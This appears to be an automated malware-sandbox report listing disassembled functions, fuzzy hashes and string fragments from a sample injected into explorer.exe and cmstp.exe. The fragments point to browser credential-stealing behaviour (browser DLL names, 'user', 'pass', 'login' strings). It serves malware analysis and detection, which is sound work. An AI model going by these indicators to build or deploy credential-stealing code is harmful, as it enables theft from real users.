opera_browser.dll, xrefs: 0FFF9629
l, xrefs: 0FFF94E2
sspi, xrefs: 0FFF9320
cli., xrefs: 0FFF9327

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
API String ID: 0-639201278
Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction ID: 60122e5876480ae4dcb483d60cad460d68fbf7e1fe1b8b43fc1f390cba9dd56e
Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
Instruction Fuzzy Hash: 95C1A070618A194FC758EF68C895AEAB3E1FF98300F84432D950EC7266DF70E906CB85

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFACD4 Relevance: 9.0, Strings: 7, Instructions: 299COMMON

Download Yara Rule

Strings

name, xrefs: 0FFFADB2
2, xrefs: 0FFFADE1
Pass, xrefs: 0FFFAD97
L: , xrefs: 0FFFAD66
User, xrefs: 0FFFADAB
UR, xrefs: 0FFFAD5F
word, xrefs: 0FFFAD9E

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction ID: d55d03c2a998ebad8de8e05efd0e8d6da4814a9e13e419f147255beff1ebc06d
Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
Instruction Fuzzy Hash: 83A1D070A187488FDB19DFA8D444BEEB7E1FF98300F40462EE48AD7252EB749549C789

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFACE2 Relevance: 9.0, Strings: 7, Instructions: 288COMMON

Download Yara Rule

Strings

name, xrefs: 0FFFADB2
2, xrefs: 0FFFADE1
Pass, xrefs: 0FFFAD97
L: , xrefs: 0FFFAD66
User, xrefs: 0FFFADAB
UR, xrefs: 0FFFAD5F
word, xrefs: 0FFFAD9E

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: UR$2$L: $Pass$User$name$word
API String ID: 0-2058692283
Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction ID: b8941fe1a822c247f4f8ad125e8a9593f2f7de41cfe8105da57bd34dfd473ad0
Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
Instruction Fuzzy Hash: 7E91BF70A187488FDB19DFA8D444BEEB7E1FF98300F40462EE48AD7252EB749549C789

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFA352 Relevance: 6.5, Strings: 5, Instructions: 242COMMON

Download Yara Rule

Strings

v, xrefs: 0FFFA4A0
n, xrefs: 0FFFA3E7
e, xrefs: 0FFFA48E
, xrefs: 0FFFA47C
., xrefs: 0FFFA3B0

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: $.$e$n$v
API String ID: 0-1849617553
Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction ID: 7de6c9614015aa68dfd53083cc6c3b19e9ac7703f2f610bbbd7831609bf7b5c1
Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
Instruction Fuzzy Hash: 217192356187488FD759DF68C4896AAB7F0FF58304F00062FE44AC7222EB75E9498B81

Uniqueness

Uniqueness Score: -1.00%

Function 0FFF5C32 Relevance: 6.4, Strings: 5, Instructions: 175COMMON

Download Yara Rule

Strings

ole3, xrefs: 0FFF5C5D
shel, xrefs: 0FFF5C90
dll, xrefs: 0FFF5C9E
l32., xrefs: 0FFF5C97
2.dl, xrefs: 0FFF5C64

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: 2.dl$dll$l32.$ole3$shel
API String ID: 0-1970020201
Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction ID: 3395bf16c3495f9d63a0cf3e15fc4eca0f091b9fb64768a66608f0db7680ed50
Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
Instruction Fuzzy Hash: DF515CB0918B4C8FDB64DFA4C045AEEB7F1FF58300F40462EA59AE7215EF30A5458B89

Uniqueness

Uniqueness Score: -1.00%

Function 0FFF686F Relevance: 6.4, Strings: 5, Instructions: 157COMMON

Download Yara Rule

Strings

\, xrefs: 0FFF69E0
dll, xrefs: 0FFF68F4
vers, xrefs: 0FFF68E4
4, xrefs: 0FFF69E9
ion., xrefs: 0FFF68EC

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: 4$\$dll$ion.$vers
API String ID: 0-1610437797
Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction ID: 5dc9db5e978c053feeba2fe0123b0d2ca357b879a04936ea57cfc66cccdcc833
Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
Instruction Fuzzy Hash: DC417034618B488BDB65EF2498457EA73E4FF98301F40466EA94EC7255EF30E5458B82

Uniqueness

Uniqueness Score: -1.00%

Function 0FFF84B2 Relevance: 6.4, Strings: 5, Instructions: 149COMMON

Download Yara Rule

Strings

dll, xrefs: 0FFF851C
cli., xrefs: 0FFF8515
sspi, xrefs: 0FFF850E
user, xrefs: 0FFF84D3
32.d, xrefs: 0FFF84DA

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: 32.d$cli.$dll$sspi$user
API String ID: 0-327345718
Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction ID: 75b4786c4484e460de77e4d10d11cc8573156b610124f802bf1f3a050dc01679
Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
Instruction Fuzzy Hash: F6416C30A18E0D8FCB94EF6884997EE73E1FF58750F44016AA90AD7222DE74D544CB86

Uniqueness

Uniqueness Score: -1.00%

Function 0FFF6432 Relevance: 5.1, Strings: 4, Instructions: 143COMMON

Download Yara Rule

Strings

.dll, xrefs: 0FFF653F
kern, xrefs: 0FFF652A
el32, xrefs: 0FFF6537
h, xrefs: 0FFF651F

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: .dll$el32$h$kern
API String ID: 0-4264704552
Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction ID: e41e580a03a9018da0996e6fd5b67ac5d66797ad0da3f6da9140b878936d92b8
Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
Instruction Fuzzy Hash: 94417270A08B488FD769DF28C4843AAB7E1FF98300F544A6E959EC726ADF70D549CB41

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFD0B9 Relevance: 5.1, Strings: 4, Instructions: 110COMMON

Download Yara Rule

Strings

f fr, xrefs: 0FFFD13D
Snif, xrefs: 0FFFD154
om:, xrefs: 0FFFD146
, xrefs: 0FFFD184

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction ID: 94ce6763222951612af206b1e7dc26a68a9194aa775ee900d894bb94be2ad05e
Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
Instruction Fuzzy Hash: 0631E27150CB886FE71ADB28C4856EAB7D4FF94340F50491EE49BC7256EE30A54ACB43

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFD0C2 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

f fr, xrefs: 0FFFD13D
Snif, xrefs: 0FFFD154
om:, xrefs: 0FFFD146
, xrefs: 0FFFD184

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: $Snif$f fr$om:
API String ID: 0-3434893486
Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction ID: 21c6935437702c3dedb6131a7c832bc9461a750038fa846ee9fadeb741499c98
Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
Instruction Fuzzy Hash: 9931D271508B486FE729DB28C4856EAB7D4FF94340F50491EE49BC7256EE30E50ACB43

Uniqueness

Uniqueness Score: -1.00%

Function 0FFF8FC2 Relevance: 5.1, Strings: 4, Instructions: 106COMMON

Download Yara Rule

Strings

.dll, xrefs: 0FFF8FFE
hild, xrefs: 0FFF8FF6
chro, xrefs: 0FFF9023
me_c, xrefs: 0FFF8FEE

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction ID: 21f4f9281fc4036275a2d4dfa911199ad1022e3a6be6abaecbc7e8174abd8e75
Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
Instruction Fuzzy Hash: 7931A130118B084FD794EF288895BAAB7E1FFD8300F84066DA54ECB226DF30D509C742

Uniqueness

Uniqueness Score: -1.00%

Function 0FFF8FBF Relevance: 5.1, Strings: 4, Instructions: 105COMMON

Download Yara Rule

Strings

.dll, xrefs: 0FFF8FFE
hild, xrefs: 0FFF8FF6
chro, xrefs: 0FFF9023
me_c, xrefs: 0FFF8FEE

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: .dll$chro$hild$me_c
API String ID: 0-3136806129
Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction ID: 5a543654cae63a3fdc486fc5b9e4e64b3d8e0e2051dc671cab999b15847e5bfd
Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
Instruction Fuzzy Hash: 5831A030118B084FD794EF688895BAAB7E1FFD8300F94066DA54ECB266DF30D509C742

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFB8C2 Relevance: 5.1, Strings: 4, Instructions: 100COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 0FFFB959
nt: , xrefs: 0FFFB91E
User-Agent: , xrefs: 0FFFB935, 0FFFB948
on.d, xrefs: 0FFFB902

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction ID: b2144ae9519899524cc783dc00641a8d841a3e902c73f2dc61b6fce77dcb6be1
Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
Instruction Fuzzy Hash: 3F31E331614A0C8FDB14EFA8C8857EDB7E0FF58204F40422AE94ED7251DF789649C789

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFB8BE Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

urlmon.dll, xrefs: 0FFFB959
nt: , xrefs: 0FFFB91E
User-Agent: , xrefs: 0FFFB935, 0FFFB948
on.d, xrefs: 0FFFB902

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: User-Agent: $nt: $on.d$urlmon.dll
API String ID: 0-319646191
Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction ID: 2f164c3c3b89add5e9ee9952f31b1f43f8f6cc31e848572d8344c78caf57c1a4
Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
Instruction Fuzzy Hash: DA210430A10A0C8FDB14EFA8C8857EDBBE0FF58244F40422AE45AD7256DF749609C789

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFCE94 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0FFFCF26
l, xrefs: 0FFFCF03
t, xrefs: 0FFFCEF4
., xrefs: 0FFFCF1F

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction ID: e891467ec10ce978efa192e609395e62932a5130ba23ae3bea11450b81873e56
Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
Instruction Fuzzy Hash: 22218B74A24A0D9BEB08EFA8C445BEDBBF0FF18300F50462EE009E3615DB74A551CB84

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFCE92 Relevance: 5.1, Strings: 4, Instructions: 87COMMON

Download Yara Rule

Strings

l, xrefs: 0FFFCF26
l, xrefs: 0FFFCF03
t, xrefs: 0FFFCEF4
., xrefs: 0FFFCF1F

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: .$l$l$t
API String ID: 0-168566397
Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction ID: caa2abd7fab67f2efb3934cdd811d5ce99acb7171787a3e427b9761e238b136a
Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
Instruction Fuzzy Hash: 04216B74A24A0D9BEB04EFA8C4447ADBAF0FF18300F50462EE009E3615DB74A5518B84

Uniqueness

Uniqueness Score: -1.00%

Function 0FFFCFF2 Relevance: 5.1, Strings: 4, Instructions: 77COMMON

Download Yara Rule

Strings

user, xrefs: 0FFFD015
pass, xrefs: 0FFFD022
auth, xrefs: 0FFFD02F
logi, xrefs: 0FFFD03C

Memory Dump Source

Source File: 00000010.00000002.3910996785.000000000FF50000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FF50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_ff50000_explorer.jbxd

Similarity

API ID:
String ID: auth$logi$pass$user
API String ID: 0-2393853802
Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction ID: 80efab263bd7b11b702b3134b37b2b570699d60e1ff0a0e2a414b910344a1574
Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
Instruction Fuzzy Hash: 0D21CD30614B0D8BCB05CF9998817EEB7E1EF88344F004619E80AEB35AD7B0E9558BC2

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: cmstp.exePID: 1824, Parent PID: 3504COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	2%
Signature Coverage:	0%
Total number of Nodes:	595
Total number of Limit Nodes:	75

Executed Functions

Function 0081A372 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00814BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00814BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0081A36D

Strings

.z`, xrefs: 0081A35D, 0081A368

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: c17f47e77443a37be01e370607603a12d691d760dcb7ad47f3bea4c3637a225a
Instruction ID: aaa65f0629bd5ae8ce43c2d2e15876443b785234a4ab8e8a3857f0cb0c3678f3
Opcode Fuzzy Hash: c17f47e77443a37be01e370607603a12d691d760dcb7ad47f3bea4c3637a225a
Instruction Fuzzy Hash: 0911F3B6200108AFCB08CF98DC94EEB77AEEF8C314B158249BA1C97240C630E8518BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0081A320 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 40
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtCreateFile.NTDLL(00000060,00000000,.z`,00814BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00814BA7,007A002E,00000000,00000060,00000000,00000000), ref: 0081A36D

Strings

.z`, xrefs: 0081A35D, 0081A368

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID: .z`
API String ID: 823142352-1441809116
Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction ID: cddf03a732fc5c7f6a3e918512618332318ec2298c6e6cc03b070e318118e0ef
Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
Instruction Fuzzy Hash: 7CF0B2B2201208ABCB08CF88DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0081A3CA Relevance: 1.5, APIs: 1, Instructions: 37filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00814D62,5EB65239,FFFFFFFF,00814A21,?,?,00814D62,?,00814A21,FFFFFFFF,5EB65239,00814D62,?,00000000), ref: 0081A415

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: cfbc5e7f30dc4cead810c7b431e3118faef03e9e0f8045690fc26e64b9e1eb2d
Instruction ID: 525d83f38e22d29922e753cac081ab996bfc7826dd21d52e24cf9aaf6e9c693a
Opcode Fuzzy Hash: cfbc5e7f30dc4cead810c7b431e3118faef03e9e0f8045690fc26e64b9e1eb2d
Instruction Fuzzy Hash: 1DF0F9B6200108AFCB14CF99DC80EEB77A9EF8C354F158248FA0DD7241C630E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0081A3D0 Relevance: 1.5, APIs: 1, Instructions: 36filenativeCOMMON

Download Yara Rule

APIs

NtReadFile.NTDLL(00814D62,5EB65239,FFFFFFFF,00814A21,?,?,00814D62,?,00814A21,FFFFFFFF,5EB65239,00814D62,?,00000000), ref: 0081A415

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction ID: d0dc655c94b5ce233b070226aee7e43430343af188501702164f3d103b3c664d
Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
Instruction Fuzzy Hash: 4FF0A9B2200108ABCB14DF89DC81DEB77ADEF8C754F158249BA1D97241D630E8518BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0081A500 Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON

Download Yara Rule

APIs

NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00802D11,00002000,00003000,00000004), ref: 0081A539

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction ID: 5564c64916ace0e7007a46501ebeea3ce435ced2b5fcf17a2212933c5cd3e243
Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
Instruction Fuzzy Hash: F7F015B2200208ABCB18DF89DC81EEB77ADEF88754F118149BE0897241C630F811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0081A44A Relevance: 1.5, APIs: 1, Instructions: 22nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00814D40,?,?,00814D40,00000000,FFFFFFFF), ref: 0081A475

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: 0b4234338f5f4b8510687637798fbefc23e52a97281c4034edb1b59b97645c2f
Instruction ID: 7761f49fb74ecb28f971844793ca5d5c6bd62b243299cc36d275cd02af6e27b9
Opcode Fuzzy Hash: 0b4234338f5f4b8510687637798fbefc23e52a97281c4034edb1b59b97645c2f
Instruction Fuzzy Hash: 08E0C27A200200BBD710EB98DD85EE73B59EF44360F01404ABA0CAB641C530EA008BE0

Uniqueness

Uniqueness Score: -1.00%

Function 0081A450 Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON

Download Yara Rule

APIs

NtClose.NTDLL(00814D40,?,?,00814D40,00000000,FFFFFFFF), ref: 0081A475

Memory Dump Source

Source File: 00000011.00000002.3878883525.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Offset: 00800000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_800000_cmstp.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction ID: 50f6fceec3886b42dda50c3124c7c0fe982d35edeb8ea2281dbcf17748dbb831
Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
Instruction Fuzzy Hash: 90D01776200214ABD714EB98DC85EE77BADEF48760F154499BA1C9B242C930FA0086E1

Uniqueness

Uniqueness Score: -1.00%

Function 04992CA0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992CAA

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 4b205450a03cb78996da599da36b402bb6c4a8f1e8cd78412f0c9774fa30c759
Instruction ID: 4e5886153fb98eba4a6349ef99e9120ed5774491b9588b13f6a9622b63543c64
Opcode Fuzzy Hash: 4b205450a03cb78996da599da36b402bb6c4a8f1e8cd78412f0c9774fa30c759
Instruction Fuzzy Hash: 9C90027170150402F100B5D8540C64600498BE0305F55D021A5025555EC665D9A16171

Uniqueness

Uniqueness Score: -1.00%

Function 04992C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992C7A

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 6368c61245fb5241e334f78c7ef1ad13d7a12a5e7b3d843e6673710d8dc0325c
Instruction ID: 7d0d745b63b2a9f0d5a1cdd2f0bf83d2bc6e159ec1ed8db5851c70da66b40539
Opcode Fuzzy Hash: 6368c61245fb5241e334f78c7ef1ad13d7a12a5e7b3d843e6673710d8dc0325c
Instruction Fuzzy Hash: AA90027170158802F110B198840874A00498BD0305F59C421A4425658D8695D9A17161

Uniqueness

Uniqueness Score: -1.00%

Function 04992C60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 04992C6A

Memory Dump Source

Source File: 00000011.00000002.3882069409.0000000004920000.00000040.00001000.00020000.00000000.sdmp, Offset: 04920000, based on PE: true

Associated: 00000011.00000002.3882069409.0000000004A49000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004A4D000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000011.00000002.3882069409.0000000004ABE000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_4920000_cmstp.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d13931ad21c5aca9f0b73153c4d4b7c844c1025531855ee01fa765ee51cea8e7
Instruction ID: 4c341ab1c0be146c718a9106d2a80b58d1e9699dc843d9a0fe79f9ef46cc133b
Opcode Fuzzy Hash: d13931ad21c5aca9f0b73153c4d4b7c844c1025531855ee01fa765ee51cea8e7
Instruction Fuzzy Hash: C590027170150842F100B1984408B4600498BE0305F55C026A0125654D8615D9617561

Uniqueness

Uniqueness Score: -1.00%

